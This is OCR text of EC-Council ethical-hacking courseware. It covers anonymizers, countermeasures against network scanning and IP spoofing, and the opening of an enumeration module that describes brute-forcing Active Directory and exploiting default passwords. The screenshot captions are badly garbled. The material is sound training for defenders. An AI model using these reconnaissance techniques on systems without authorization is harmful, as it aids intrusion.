1 check Tor Browser
Tbols Help
.
sr
LS
2 [>
mas
Attribute
Value
[serene eee!
oe
see Asm en
Reverse DUS:
ae
hd
JonDoBrowser provides strong
cod
de | ¥
LEARN MORE about the individual tests performed by the IP Check... Click here!
pee
Rating
d How to we Thunderbirwith
93.115.2412 (Tor) (ON (Click bere fix this eoblem)
Mattar Reconsuistance Tool ‘evercoolae Panoptichck DeAnonymzer
|
Figure 3.101: Screenshot of Whonix
Some additional anonymizers are listed below: =
Psiphon (https://psiphon.ca)
=
TunnelBear (https://www.tunnelbear.com)
=
Invisible Internet Project (I2P) (https://geti2p.net)
=
JonDo (https://anonymous-proxy-servers.net)
Module 03 Page 375
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Scanning Networks
Discussed below are various anonymizers for mobile devices:
=
Orbot Source: https://guardianproject.info Orbot is a proxy app that allows other apps to use the Internet more securely. It uses Tor to encrypt Internet traffic and then hides it by bouncing through a series of computers around the world. Tor is a free software that provides an open network to help defend your system against any form of network surveillance that may compromise personal freedom and privacy as well as confidential business activities and relationships through a type of state security monitoring known as “traffic analysis.” Orbot creates a truly private Internet connection. 48%ia 12:20 PM
VPN Mode
bled Apps
¥Y
f©@*
Figure 3.102: Screenshot of Orbot
Module 03 Page 376
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks =
Exam 312-50 Certified Ethical Hacker
Psiphon Pro
Source: https://psiphon.ca Psiphon Pro is a circumvention tool developed by Psiphon, Inc., which uses VPN, SSH, and HTTP proxy technology to provide you with open and uncensored access to Internet content. However, Psiphon Pro does not increase online privacy and is not an online security tool. Features:
o
Browser or VPN (whole-device) mode: one can choose whether to tunnel everything or just the web browser.
©
In-app stats: This lets you know how much traffic you have been using.
Pom P) Psiphon
STATS
OPTIONS
running on port 108¢ P proxy
on port running
VPN service running VPN ti KS run ing Running in whole device mode
Open Browser
Figure 3.103: Screenshot of Psiphon Pro.
Module 03 Page 377
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Censorship Alkasir
|
Exam 312-50 Certified Ethical Hacker
Circumvention
Tools: Alkasir
Alkasir is a cross-platform, open-source, and
robust website censorship circumvention tool
Tails
that also maps censorship patterns around
|
the world
and Tails
C | EH
Tails isa live operating system that a user can start on any computer from a DVD,
USB stick, or SD card
Welcome to Tails!
‘etes/athab. com
https: boun. 0g
Censorship Circumvention Tools =
Alkasir
Source: https://github.com Alkasir is a cross-platform, open-source, and robust website censorship circumvention tool that also maps censorship patterns around the world. Alkasir enables attackers to identify censored links. It keeps them informed about links that are still blocked and links that are not blocked. Eh coop star - 9 x ee ed ee {© Behe = = Noni Opminhcbm =| ® Scnenion =] 27. ironmayfrcmnten “= Obecomet -] & une =| , GE re reconeov PRA... %
Google Search | tm Feeing Lucky Aavnsing ogame
Busnes
Satons Aon Googe
ese OnecT
Front Bed Figure 3.104: Screenshot of Alkasir
Module 03 Page 378
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Scanning Networks
Tails Source: https://tails.boum.org Tails is a live OS that users can run on any computer from a DVD drive, USB stick, or SD card. It uses state-of-the-art cryptographic tools to encrypt files, emails, and instant messaging. It allows attackers to use the Internet anonymously and circumvent censorship. It leaves no trace on the computer. Shutdown
Welcome to Tails!
ge & Region Langua
@
EE] Keyboard Layout
English (US)
(37 Formats
United States
Encrypted Persistent Storage
inter your
passphrase to
Additional Settings
unlock the
D Show Passphrase
persist
@
The default settings are safe in most situations. To add a custom setting, press the "+" button below. +
Figure 3.105: Screenshot of Tails
Module 03 Page 379
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
CEH
LO#07: Explain Network Scanning Countermeasures
Network Scanning Countermeasures In ethical hacking, the ethical hacker, also known as the “pen tester,” has to perform an additional task that a normal hacker does not follow (i.e., adopting countermeasures against the respective vulnerabilities determined through hacking). This is essential because knowing security loopholes in your network is worthless unless you adopt measures to protect them against real hackers. This section discusses various countermeasures to defend against network scanning attacks.
Module 03 Page 380
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Ping Sweep Countermeasures
if EH
Configure firewalls to detect and prevent ping sweep attemptsinstantaneously Use intrusion detection systems (IDSes) and intrusion prevention systems (IPSes), such as Snortto detect and prevent ping sweep attempts
Carefully evaluate the type of ICMP traffic flowing through enterprise networks Terminate the connection with any host sending more than 10 ICMP ECHO requests Use a DMZand allowonly commandssuch as ICMP ECHO_REPLY, HOST UNREACHABLE, and TIME EXCEEDEDin the pmz Limit ICMP traffic with access-control lists (ACLs) to the ISP’s specific IP addresses
Ping Sweep Countermeasures Some countermeasures for preventing ping sweep attempts are as follows: =
Configure the firewall to detect and prevent ping sweep attempts instantaneously.
=
Use intrusion detection systems (IDSes) and intrusion prevention systems (IPSes), such as Snort (https://www.snort.org), to detect and prevent ping-sweep attempts.
=
Carefully evaluate the type of Internet Control Message Protocol (ICMP) traffic flowing through enterprise networks.
=
Terminate the connection with any host sending more than 10 ICMP ECHO requests.
=
Use a demilitarized zone (DMZ) and allow only commands such as ICMP
=
HOST
UNREACHABLE, and TIME
EXCEEDED in the DMZ.
_ECHO_REPLY,
Limit ICMP traffic with access-control lists (ACLs) to the ISP’s specific IP addresses
Module 03 Page 381
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Port Scanning Countermeasures B
Configure
C iE H
firewall and IDS rules to detect and
Use a custom rule set to lock down the network
block probes
and block unwanted ports at the firewall
Run port scanning tools against hostson the network to determine whether the firewall properly detects port scanningactivity
Filter all ICMP messages (i.e., inbound ICMP message types and outbound ICMP type 3 unreachable messages) at the firewalls and routers
B
Ensurethat the mechanisms used for routing and filtering at the routersand firewalls, respectively, cannotbe bypassed usinga particular source port or source routing methods Ensurethat the router, IDS, and firewall firmware are updated to their latest releases/versions
Perform TCP and UDP scanning alongwith ICMP probes against your organization’sIP address space to check the network configuration andits available ports 3]
Ensure that anti-scanning and anti-spoofingrules are properly configured
Port Scanning Countermeasures As discussed previously, port scanning provides a large amount of useful information to attackers, such as IP addresses, host names, open ports, and services running on ports. Open ports specifically offer an easy means for an attacker to break into the network. However, there is no cause for concern, provided that the system or network is secured against port scanning by adopting the following countermeasures: Configure firewall and intrusion detection system (IDS) rules to detect and block probes. The firewall should be capable of detecting the probes sent by attackers using portscanning tools. It should not allow traffic to pass through after simply inspecting the TCP header. The firewall should be able to examine the data contained in each packet before allowing traffic to pass through it. Run the port scanning tools against hosts on the network to determine whether the firewall accurately detects the port scanning activity. Some firewalls do a better job than others in terms of detecting stealth scans. For example, many firewalls have specific options for detecting SYN scans, whereas others ignore FIN scans. Ensure
that
the
releases/versions.
router,
IDS,
and
firewall
firmware
are
updated
with
their
latest
Configure commercial firewalls to protect the network against fast port scans and SYN floods. Hackers use tools such as Nmap and perform OS detection to sniff the details of a remote OS. Thus, it is important to employ an IDS in such cases. Snort (https://www.snort.org) is
Module 03 Page 382
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
a very useful intrusion detection and prevention technology, mainly because signatures are frequently available from public authors. =
Keep as few ports open as possible and filter the rest, as an intruder may attempt to enter through any open port. Use a custom rule set to lock down the network, block unwanted ports at the firewall, and filter the following ports: 135-159, 256-258, 389, 445, 1080, 1745, and 3268.
=
Block unwanted services running on the ports and update the service versions.
=
Ensure that the versions of services running on the ports are non-vulnerable.
=
Block inbound ICMP message types and all outbound ICMP type-3 unreachable messages at border routers arranged in front of the company’s main firewall.
=
Attackers attempt to perform source routing and send packets to the targets, which may not be reachable via the Internet, using an intermediate host that can interact with the target. Hence, it is necessary to ensure that the firewall and router can block such sourcerouting techniques.
=
Ensure that the mechanisms used for routing and filtering at the routers and firewalls, respectively, cannot be bypassed using a particular source port or source routing methods.
=
Test the IP address space using TCP and UDP port scans as well as ICMP determine the network configuration and accessible ports.
=
Ensure that the anti-scanning and anti-spoofing rules are configured.
=
Ifa commercial firewall is in use, then ensure the following: o
Itis patched with the latest updates.
o
It has correctly defined anti-spoofing rules.
©
Its fast-mode services are unusable.
probes to
=
Ensure that TCP wrappers limit access to the network based on domain addresses.
=
Test how the network firewall and IDS manages the fragmented packets using fragtest and fragroute.
=
Use proxy servers to block fragmented or malformed packets.
=
Ensure that the firewalls forward open port scans to empty hosts or honeypots to make the port-scanning task difficult and time-consuming.
=
Employ an intrusion prevention system (IPS) to identify port scan attempts and blacklist IP addresses.
Module 03 Page 383
names or IP
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Banner Grabbing
Exam 312-50 Certified Ethical Hacker
Countermeasures
C iE H
Disabling or Changing Banner
Hiding File Extensions from Web Pages
@ Display false bannersto mislead or deceive attackers
® File extensions reveal information about the underlying server technology thatan attackercan utilizeto launch attacks
@ Turnoff unnecessary serviceson the network host to limit the disclosure of information
@
. 7 . . Hide file extensionsto mask the web technologies
© Use server masking tools to disable or change banner = information
a | @ Replace application mappings such as .asp with htm ee, an or .foo, etc. to disguise the .identities of servers
@ ForApache2.x with themod_headers module, use adirectiveinthe httpd.conf file to change the
© Apach . Ore leusers canuse mod_negotiation
bannerinformation header and set the server asNew
Server
irectives
Name
@ IIS users canuse tools such as PageXchanger to manage the file extensions
© Alternatively, changethe ServerSignature line to ServerSignature
Offinthe httpd.conf file
©
itis preferable to not use file extensionsat all
Banner Grabbing Countermeasures Disabling or Changing Banner An open port indicates that a service/banner is running on it. When attackers connect to an open port using banner grabbing techniques, the system presents a banner containing sensitive information such as the OS, server type, and version. Using the information gathered, the attacker identifies specific vulnerabilities to exploit and then launches attacks. The countermeasures against banner grabbing attacks are as follows: o
Display false banners to mislead or deceive attackers.
o
Turn off unnecessary services on the network host to limit information disclosure.
o
Use server masking tools to disable or change banner information.
o
Remove unnecessary HTTP headers and response data and camouflage the server by providing false signatures. This also provides the option of eliminating file extensions such as .asp and . aspx, which clearly indicate that the site is running on a Microsoft
server. o
For Apache 2.x with the mod_headers module, use a directive in the httpd.conf file to change the banner information header and set the server as New Server Name.
o
Alternatively, change the ServerSignature httpd. conf file.
©
Disable the details of the vendor and version in the banners.
o
Modify the value of Server Tokens from Full to Prod in Apache’s httpd. conf file to prevent disclosure of the server version.
Module 03 Page 384
line to ServerSignatureOff in the
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks °
Exam 312-50 Certified Ethical Hacker
Modify the value of RenoveServerHeader from 0 to 1 in the Ur1Scan. ini config file found at C: WindowsSystem32inetservUrlscan. This method prevents
disclosure of the server version.
Trick attackers by modifying the value of AlternateServerName to values such as xyz
Of myserver.
Disable HTTP methods application servers.
such
as
Connect,
Put,
Delete,
and
Options
Remove the X-Powered-By header only with the customHeaders section of the web. config file. =
from
web
option in the
Hiding File Extensions from Web Pages File extensions reveal information about the underlying server technology that an attacker can use to launch attacks. The countermeasures against such banner grabbing attacks are as follows: °
Hide file extensions to mask the web technology.
°
Replace application mappings identities of servers.
°
Apache users can use mod_negotiation
°
IIS users can use tools such as PageXchanger to manage the file extensions.
such
as .asp with
.htm,
.foo, etc. to disguise
the
directives.
Note: It is preferable to not use file extensions at all.
Module 03 Page 385
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
IP Spoofing Detection Techniques: Direct TTL Probes | . |
CEH
Send a packet to the host of a suspected spoofed packet that triggers a reply and compare the TTL with that of the suspected packet; if the TTL in the reply is not the same as the packet being checked, this implies that it is a spoofed packet This technique is successful when the attacker is in a different subnet from that of the victim
‘Sending a packet with spoofed 10.0.0.5 IP—TTL13
Attacker (Spoofed Address 10.0.0.5) 10.0.0.5
IP Spoofing Detection Techniques: IP Identification Number
01
CEH
Send a probe to the host of a suspected spoofed traffic that triggersa reply and compare the IPID with the suspected traffic
02
If the IPIDs are not close in value to the packet being checked, then the suspected trafficis spoofed
03
This technique is considered reliable even if the attacker is in the same subnet Send packet with spoofed IP 10. 0.5; 1P ID 2586 Attacker
(Spoofed Address
100.05)
Module 03 Page 386
Terget
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Scanning Networks
IP Spoofing Detection Techniques: TCP Flow Control Method
CE H
|@ Attackers sending spoofed TCP packets will not receive the target's SYN-ACK packets
|@ Therefore, attackers cannot respond to a change in the congestion window size |@ When received traffic continues after a window size is exhausted, the packets are most likely spoofed
Sending a SYN packet with spoofed 10.0.0.51P Attacker
(Spoofed Address 10.0.0.5)
IP Spoofing Detection Techniques =
Direct TTL Probes In this technique, you initially send a packet (ping request) to the legitimate host and wait for a reply. Check whether the TTL value in the reply matches with that of the packet you are checking. Both will have the same TTL if they are using the same protocol. Although the initial TTL values vary according to the protocol used, a few initial TTL values are commonly used. For TCP/UDP, the values are 64 and 128; for ICMP, they are 128 and 255. Sending a packet with
spoofed 10.0.0.5 IP - TTL 13 Attacker
(Spoofed Address 10.0.0.5) 7 10.0.0.5 Figure 3.106: IP Spoofing detection technique: Direct TTL Probes
If the reply is from a different protocol, then you should check the actual hop count to detect the spoofed packets. Deduct the TTL value in the reply from the initial TTL value to determine the hop count. The packet is a spoofed packet if the reply TTL does not match the TTL of the packet. It will be very easy to launch an attack if the attacker knows the hop count between the source and the host. In this case, the test result is a false negative.
Module 03 Page 387
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
This technique is successful when the attacker is in a different subnet from that of the victim. Note: Normal traffic from one host can contrast TTLs depending on traffic patterns. =
IP Identification Number Users can identify spoofed packets by monitoring the IP identification (IPID) number in the IP packet headers. The IPID increases incrementally each time a system sends a packet. Every IP packet on the network has a unique "IP identification" number, which is increased by one for every packet transmission. To identify whether a packet is spoofed, send a probe packet to the source IP address of the packet and observe the IPID number in the reply. The IPID value in the response packet must be close to but slightly greater than the IPID value of the probe packet. The source address of the IP packet is spoofed if the IPID of the response packet is not close to that of the probe packet. This method
subnet.
is effective even when
Send packet with
both the attacker and the target are on the same
o>
Attacker
(Spoofed Address 10.0.0.5)
10.0.0.5 Figure 3.107: IP Spoofing detection technique: IP Identification Number
=
TCP Flow Control Method The TCP can optimize the flow control on both the sender’s and the receiver's end with its algorithm. The algorithm accomplishes flow control using the sliding window principle. The user can control the flow of IP packets by the window size field in the TCP header. This field represents the maximum amount of data that the recipient can receive and the maximum amount of data that the sender can transmit without acknowledgement. Thus, this field helps to control data flow. The sender should stop sending data whenever the
window size is set to zero.
In general flow control, the sender should stop sending data once the initial window size is exhausted. The attacker, who is unaware of the ACK packet containing window size information, might continue to send data to the victim. If the victim receives data packets beyond the window size, they are spoofed packets. For effective flow control and early detection of spoofing, the initial window size must be very small. Most spoofing attacks occur during the handshake, as it is challenging to build multiple spoofing replies with the correct sequence number. Therefore, apply the flow control spoofed packet detection method to the handshake. In a TCP handshake, the host sending Module 03 Page 388
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
the initial SYN packet waits for SYN-ACK before sending the ACK packet. To check whether you are getting the SYN request from a genuine client or a spoofed one, set SYN-ACK to zero. If the sender sends an ACK with any data, it means that the sender is a spoofed one. This is because when SYN-ACK is set to zero, the sender must respond to it only with the ACK packet, without additional data. Sending a SYN packet with spoofed 10, Attacker
(Spoofed Address 10.0.0.5)
Target
10.0.0.5 Figure 3.108: IP Spoofing detection technique: TCP Flow Control Method
Attackers sending spoofed TCP packets will not receive the target's SYN-ACK packets. Attackers cannot respond to changes in the congestion window size. When the received traffic continues after a window size is exhausted, the packets are most likely spoofed.
Module 03 Page 389
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
IP Spoofing Countermeasures
CE H
@ _ Encrypt all the network traffic using cryptographic network protocols such as IPsec, TLS, SSH, and HTTPS ©
Use multiple firewallsto provide a multi-layered depth of protection Do not rely on IP-based authentication
Use a random initial sequence number to prevent IP spoofing attacks based on sequence number spoofing Ingress Filtering: Use routers and firewalls at your network perimeter to filter incoming packets that appear to come from an internal IP address Egress Filtering: Filter all outgoing packets with an invalid local IP address as the source address
IP Spoofing Countermeasures As mentioned previously, IP spoofing is a technique adopted by a hacker to break into a target network. Therefore, to protect the network from external hackers, IP spoofing countermeasures should be applied in network security settings. Some IP spoofing countermeasures that can be applied are as follows: Avoid Trust Relationships Do not rely on IP-based authentication. Attackers may masquerade as trusted hosts and send malicious packets. If these packets are accepted under the assumption that they are “clean” because they are from a trusted host, malicious code will infect the system. Therefore, it is advisable to test all packets, even when they originate from a trusted host. This problem can be avoided by implementing password authentication along with trust relationship—based authentication. Use Firewalls and Filtering Mechanisms As stated above, all incoming and outgoing packets should be filtered to avoid attacks and loss of sensitive information. A firewall can restrict malicious packets from entering a private network and prevent severe data loss. Access-control lists (ACLs) can be used to block unauthorized access. However, the possibility of an insider attack also exists. Inside attackers can send sensitive information about the business to competitors, which could lead to financial loss and other issues. Another risk of outgoing packets is that an attacker may succeed in installing a malicious sniffing program running in a hidden mode on the network. These programs gather and send all the network information to the attacker without any notification after filtering out the outgoing packets. Therefore, the scanning of outgoing packets must be assigned the same importance as that of incoming packets.
Module 03 Page 390
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks =
Exam 312-50 Certified Ethical Hacker
Use Random Initial Sequence Numbers Most devices choose their initial sequence numbers (ISNs) based on timed counters. This makes the ISNs predictable, as it is easy for an attacker to determine the concept of generating an ISN. The attacker can determine the ISN of the next TCP connection by analyzing the ISN of the current session or connection. If the attacker can predict the ISN, then they can establish a malicious connection to the server and sniff network traffic. To avoid this risk, use random ISNs.
=
Ingress Filtering Ingress filtering prevents spoofed traffic from because it enhances the functionality of Configuring and using ACLs that drop packets range is one method of implementing ingress
=
entering the Internet. It is applied to routers the routers and blocks spoofed traffic. with a source address outside the defined filtering.
Egress Filtering Egress filtering is a practice that aims to prevent IP spoofing by blocking outgoing packets with a source address from the outside.
=
Use Encryption
To maximize network security, use strong encryption for all traffic placed on transmission media without considering its type and location. This is the best method to prevent IP spoofing attacks. IPSec can be used to drastically reduce the IP spoofing risk, as it provides data authentication, integrity, and confidentiality. Encryption sessions should be enabled on the router so that trusted hosts can communicate securely with local hosts. Attackers tend to focus on targets that are easy to compromise. If an attacker desires to break into an encrypted network, they must decrypt the entire slew of encrypted packets, which is a difficult task. Therefore, an attacker is likely to move on and attempt to find another target that is easy to compromise or simply abort the attempt. Moreover, use the latest encryption algorithms that provide strong security. =
SYN Flooding Countermeasures Countermeasures against SYN flooding attacks can also help avoid IP spoofing attacks.
=
Other IP Spoofing Countermeasures o
Enhance the integrity and confidentiality of websites by migrating from IPv4 to IPv6é during development.
o
Implement digital certificate authentication mechanisms such as domain and two-way auth certificate verification.
o
Use a secure VPN while accessing any type of public Internet service such as free WiFi and hotspots.
o
Employ application-specific mitigation devices such as Behemoth scrubbers for deeplevel packet investigation at a high speed of nearly 100 million packets/s.
Module 03 Page 391
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
o
Implement dynamic IPv6 address variation reduce the time of active vulnerability.
o
Configure routers to send encoded information about fragmented packets entering the network.
o
Configure routers to verify the data packets using their signatures by storing the arriving data packet digests.
o
Configure routers to hide intranet hosts from the external network by implementing modifications to the network address translation (NAT).
o
Configure internal switches to table the DHCP spoofed traffic.
Module 03 Page 392
using
a random
address generator to
static addresses to filter malicious
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Scanning Detection and Prevention Tools ExtraHop
It provides complete visibility, real-time detection, and intelligent response to malicious network scanning
CE H Q:|
Fi,j2
Splunk Enterprise Security etps://wrr splunk.com — Scanlogd
esrftabcom Vectra Cognito Detect etps://arrw.vectro.0
ZQ _ BM Security QRadar XDR ‘tts: //www.bm.com
Cynet 360 ttosif/www.cynet.com https/jwurw extrahop com Copyright © by
Scanning Detection and Prevention Tools Security professionals use various sophisticated tools such as ExtraHop and Splunk Enterprise Security to detect active networks and port scanning attempts initiated by attackers.
=
ExtraHop Source: https://www.extrahop.com ExtraHop provides complete visibility, real-time detection, and intelligent response to malicious network scanning. This tool allo ws security professionals to automatically discover and identify every device and its vulnerabilities, including unmanaged Internet of things (loT) devices in a network. Further, this tool allows security professionals to analyze all network interactions in real time, including all cloud transactions and SSL/TLS
encrypted traffic, to provide complete visibility inside the network perimeter. ExtraHop also assists in the auto-discovery and classification of every device network, using which security teams can ana lyze all communication.
Module 03 Page 393
in the
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
peauation | Rv
Exam 312-50 Certified Ethical Hacker
Overview Dashboards Detections Security Network Perimeter
Active Devices
NewDevcs
280
Alerts Asets Records Packets
n
©
ERR +0 erate ExecutiveReport
™...
0
Network Health Indicators Network Health Indicators re ns ons une une
Figure 3.109: Screenshot of ExtraHop
Some of the additional scanning detection and prevention tools are listed below:
=
Splunk Enterprise Security (https://www.splunk.com)
=
Scanlogd (https://github.com)
=
Vectra Cognito Detect (https://www.vectra.ai)
=
IBM Security QRadar XDR (https://www.ibm.com)
=
Cynet 360 (https://www.cynet.com)
Module 03 Page 394
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Module Summary Q
CE H
In this module, we have discussed the following:
> Howattackers discover live hosts from a range of IP addresses by sending various ping scan requests to multiple hosts bs
> Howattackers perform different scanning techniques to determine open ports, services, service versions, etc. on the target system > Howattackers perform banner grabbing or OS fingerprintingto determine the operating system runningon a remote target system
> Various scanning techniques that attackers can employto bypass IDS/firewallrules and logging mechanisms, and disguise themselvesas regular network traffic
> Network scanning countermeasures to defend against network scanning attacks C1 In thenext module, we will discussin detail how attackers, as well as ethical hackersand pen-testers, perform enumeration to collectinformation abouta target before an attack or audit
Module Summary This module discussed how attackers determine live hosts from a range of IP addresses by sending various ping scan requests to multiple hosts. It also described how attackers perform different scanning techniques to determine open ports, services, service versions, etc., on the target system. Furthermore, it explained how attackers perform banner grabbing or OS fingerprinting to determine the OS running on a remote target system. It also illustrated various scanning techniques that attackers can adopt to bypass IDS/firewall rules and logging mechanisms and hide themselves as usual under network traffic. Finally, it ended with a detailed
discussion on network scanning countermeasures to defend against network scanning attacks. In the next module, we will discuss in detail how attackers as well as ethical hackers and pen-
testers perform enumeration to collect information about a target before an attack or audit.
Module 03 Page 395
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
C'EH
EC-Council
Certified |) Ethical Hacker
————
MODULE 04 ENUMERATION
EC-COUNCIL OFFICIAL CURRICULA
————
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
CEH
LEARNING LO#01: Explain Enumeration Concepts © LO#02: Demonstrate Different Techniques for NetBIOS Enumeration © LO#03: Demonstrate Different Techniques for SNMP Enumeration © LO#04: Use Different Techniques for LDAP Enumeration
OBJECTIVES
© LO#05: Use Different Techniques for NTP and NFS Enumeration © LO#06: Demonstrate Different Techniques for SMTP and DNS Enumeration © LO#07: Demonstrate IPsec, VoIP, RPC, Unix/Linux, Telnet, FTP, TFTP, SMB, IPV6, and BGP Enumeration © LO#08: Explain Enumeration Countermeasures Copyright © by
Strictly Prohibited
Learning Objectives In the previous modules, you learned about footprinting and network scanning. This module covers the next phase, enumeration. We start with an introduction to enumeration concepts. Subsequently, the module provides insight into different techniques for Network Basic Input/Output System (NetBIOS), Simple Network Management Protocol (SNMP), Lightweight Directory Access Protocol (LDAP), Network Time Protocol (NTP), Network File System (NFS), Simple Mail Transfer Protocol (SMTP), Domain Name System (DNS), Internet Protocol Security (IPsec), Voice over Internet Protocol (VoIP), remote procedure call (RPC), Linux/Unix, Telnet, File Transfer Protocol (FTP), Trivial FTP (TFTP), Server Message Block (SMB), Internet Protocol version 6 (IPv6), and Border Gateway Protocol (BGP) enumeration. The module ends with an overview of
enumeration countermeasures.
At the end of this module, you will be able to: =
Describe enumeration concepts
=
Explain different techniques for NetBIOS enumeration
=
Explain different techniques for SNMP enumeration
=
Explain different techniques for LDAP and active directory (AD) enumeration
=
Explain different techniques for NTP enumeration
=
Explain different techniques for NFS enumeration
=
Explain different techniques for SMTP and DNS enumeration
=
Explain other enumeration techniques such as IPsec, VoIP, RPC, Linux/Unix, Telnet, FTP,
TFTP, SMB, IPv6, and BGP enumeration
=
Apply enumeration countermeasures
Module 04 Page 399
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Enumeration
C/EH
LO#01: Explain Enumeration Concepts
Copyright © by
Al Rights Reserved. Reproductionis Stricty Prohibited
Enumeration Concepts Different sections of this module deal with the enumeration of different services and ports. Before discussing the actual enumeration process, we introduce concepts related to enumeration.
Module 04 Page 400
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
What is Enumeration?
CE H Information Enumerated by Intruders
@
Enumeration involvesan attacker creatingactive connections witha target system and performing directed queries to gain
—
more information about the target
‘Attackers use the extracted information to identify points for
a system attack and perform password attacks to gain unauthorized accessto information system resources
@
iy
Networkshares
ro
Routing tables
%
Audit and service settings
a
are conducted in anintranet Enumeration techniques
environment
Network resources
SNMP and FQDN details
ie
Machine names
&
Users and groups
Applications and banners
What is Enumeration? Enumeration is the process of extracting usernames, machine names, network resources, shares,
and services from a system or network. In the enumeration phase, an attacker creates active connections with the system and sends directed queries to gain more information about the target. The attacker uses the information collected using enumeration to identify vulnerabilities in the system security, which help them exploit the target system. In turn, enumeration allows the attacker to perform password attacks to gain unauthorized access to information system resources. Enumeration techniques work in an intranet environment. In particular, enumeration allows the attacker to collect the following information: =
Network resources
=
Network shares
=
Routing tables
=
Audit and service settings
=
SNMP and fully qualified domain name (FQDN) details
=
Machine names
=
Users and groups
=
Applications and banners
During enumeration, attackers may stumble upon a remote inter-process communication (IPC) share, such as IPCS in Windows, which they can probe further to connect to an administrative share by brute-forcing admin credentials and obtain complete information about the file-system listing that the share represents. Module 04 Page 401
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
The previous modules highlighted how attackers gather necessary information about a target without any illegal activity. However, enumeration activities may be illegal depending on the organization's policies and the laws that are in effect. An ethical hacker or pen tester should always acquire proper authorization before performing enumeration.
Module 04 Page 402
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
Techniques for Enumeration
o
Extract usernames using
email IDs
ladecval
Brute force Active Directory
Extract user groups from
C E H Extract information
default passwords
using
(S)
Sy
Extract information using
(5)
Windows
Extract usernames using
SNMP
Techniques for Enumeration The following techniques are used to extract information about a target. =
Extract usernames using email IDs Every email address contains two parts, a username and a domain name, in the format “username@domainname.”
=
Extract information using default passwords Many online resources provide a list of default passwords assigned by manufacturers to their products. Users often ignore recommendations to change the default usernames and passwords provided by the manufacturer or developer of a product. This eases an attacker's task of enumerating and exploiting the target system.
=
Brute force Active Directory
Microsoft Active Directory is susceptible to username enumeration at the time of usersupplied input verification. This is a design error in the Microsoft Active Directory implementation. If a user enables the “logon hours” feature, then all the attempts at service authentication result in different error messages. Attackers take advantage of this to enumerate valid usernames. An attacker who succeeds in extracting valid usernames can conduct a brute-force attack to crack the respective passwords. =
Extract information using DNS Zone Transfer A network administrator can use DNS zone transfer to replicate DNS data across several DNS servers or back up DNS files. For this purpose, the administrator needs to execute a specific zone-transfer request to the name server. If the name server permits zone
Module 04 Page 403
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
